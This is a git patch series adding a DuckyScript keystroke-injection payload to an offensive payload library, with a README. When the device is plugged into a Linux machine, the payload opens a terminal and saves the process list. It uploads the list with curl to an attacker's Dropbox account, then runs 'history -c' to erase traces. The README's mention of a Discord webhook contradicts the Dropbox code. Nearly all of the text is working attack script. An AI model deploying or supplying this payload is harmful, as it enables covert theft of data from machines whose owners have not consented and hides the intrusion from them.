From 1b29844cc43e626e272dca768164805873d8fea4 Mon Sep 17 00:00:00 2001 From: Aleff Date: Mon, 12 Jun 2023 12:02:44 +0200 Subject: [PATCH 1/3] Exfiltrate Process Info --- .../ExfiltrateProcessInfo_Linux/payload.txt | 72 +++++++++++++++++++ 1 file changed, 72 insertions(+) create mode 100644 payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt diff --git a/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt b/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt new file mode 100644 index 0000000..b3607ff --- /dev/null +++ b/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt @@ -0,0 +1,72 @@ +REM ########################################## +REM # | +REM # Title : Exfiltrate Process Info | +REM # Author : Aleff | +REM # Version : 1.0 | +REM # Category : Exfiltration | +REM # Target : Linux | +REM # | +REM ########################################## + +REM Requirements: +REM - Internet Connection +REM - Discord Webhook + +DELAY 1000 +CTRL-ALT t +DELAY 2000 + + +REM #### GET PROCESS SECTION #### + + +STRING ps aux > process.txt +ENTER +DELAY 500 + + +REM #### EXFILTRATE SECTION #### + + +REM Required: Set here your Dropbox access TOKEN +DEFINE TOKEN example +STRING ACCESS_TOKEN=" +STRING TOKEN +STRING " +ENTER +DELAY 500 + +STRING USER_NAME=$(whoami) +ENTER +DELAY 500 + +STRING TXT_PATH="/home/$USER_NAME/process.txt" +ENTER +DELAY 500 + +REM Set yout Dropbox folder name +DEFINE DROPBOX_FOLDER_NAME example +STRING DROPBOX_FOLDER="/ +STRING DROPBOX_FOLDER_NAME +STRING " +ENTER +DELAY 500 + +DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload +STRING curl -X POST +STRING DROPBOX_API_CONST +STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$TXT_PATH" +ENTER + +REM It depends by the internet connection, btw 1 or 2 seconds, generally, is sufficient +DELAY 2000 + + +REM #### REMOVE TRACES #### + + +STRING history -c +ENTER +DELAY 500 +STRING exit +ENTER From bb1dc06398f4a9c106154420b70ed83a5e7a225c Mon Sep 17 00:00:00 2001 From: aleff-github Date: Mon, 12 Jun 2023 12:03:10 +0200 Subject: [PATCH 2/3] Create README.md --- .../ExfiltrateProcessInfo_Linux/README.md | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/README.md diff --git a/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/README.md b/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/README.md new file mode 100644 index 0000000..78c32e5 --- /dev/null +++ b/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/README.md @@ -0,0 +1,27 @@ + +# Exfiltrate Process Info - Linux ✅ + +A script used to exfiltrate the process info on a Linux machine. + +**Category**: Exfiltration + +## Description + +A script used to exfiltrate the process info on a Linux machine. + +Opens a shell, get the process info, set the Discord webhook configuration, send it to the discord webhook, erase traces. + +## Getting Started + +### Dependencies + +* Internet Connection +* Discord Webhook + +### Executing program + +* Plug in your device + +### Settings + +* Set the Discord Webhook configuration \ No newline at end of file From 28bad4530609505775446e2eafc7050b8a9085f0 Mon Sep 17 00:00:00 2001 From: Kalani Helekunihi <324833+kalanihelekunihi@users.noreply.github.com> Date: Mon, 12 Jun 2023 14:36:12 -0400 Subject: [PATCH 3/3] Update payload.txt --- .../ExfiltrateProcessInfo_Linux/payload.txt | 62 +++++-------------- 1 file changed, 16 insertions(+), 46 deletions(-) diff --git a/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt b/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt index b3607ff..5716a35 100644 --- a/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt +++ b/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt @@ -12,61 +12,31 @@ REM Requirements: REM - Internet Connection REM - Discord Webhook -DELAY 1000 -CTRL-ALT t +REM Required: Set here your Dropbox access TOKEN +DEFINE #TOKEN example +DEFINE #DROPBOX_FOLDER_NAME example +DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload + + +DEFAULT_DELAY 500 +CTRL ALT t DELAY 2000 - REM #### GET PROCESS SECTION #### - - -STRING ps aux > process.txt -ENTER -DELAY 500 - +STRINGLN ps aux > process.txt REM #### EXFILTRATE SECTION #### - - -REM Required: Set here your Dropbox access TOKEN -DEFINE TOKEN example -STRING ACCESS_TOKEN=" -STRING TOKEN -STRING " -ENTER -DELAY 500 - -STRING USER_NAME=$(whoami) -ENTER -DELAY 500 - -STRING TXT_PATH="/home/$USER_NAME/process.txt" -ENTER -DELAY 500 +STRINGLN ACCESS_TOKEN="#TOKEN" +STRINGLN USER_NAME=$(whoami) +STRINGLN TXT_PATH="/home/$USER_NAME/process.txt" REM Set yout Dropbox folder name -DEFINE DROPBOX_FOLDER_NAME example -STRING DROPBOX_FOLDER="/ -STRING DROPBOX_FOLDER_NAME -STRING " -ENTER -DELAY 500 - -DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload -STRING curl -X POST -STRING DROPBOX_API_CONST -STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$TXT_PATH" -ENTER +STRINGLN DROPBOX_FOLDER="/#DROPBOX_FOLDER_NAME" +STRINGLN curl -X POST #DROPBOX_API_CONST --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$TXT_PATH" REM It depends by the internet connection, btw 1 or 2 seconds, generally, is sufficient DELAY 2000 - REM #### REMOVE TRACES #### - - -STRING history -c -ENTER -DELAY 500 -STRING exit -ENTER +STRINGLN history -c +STRINGLN exit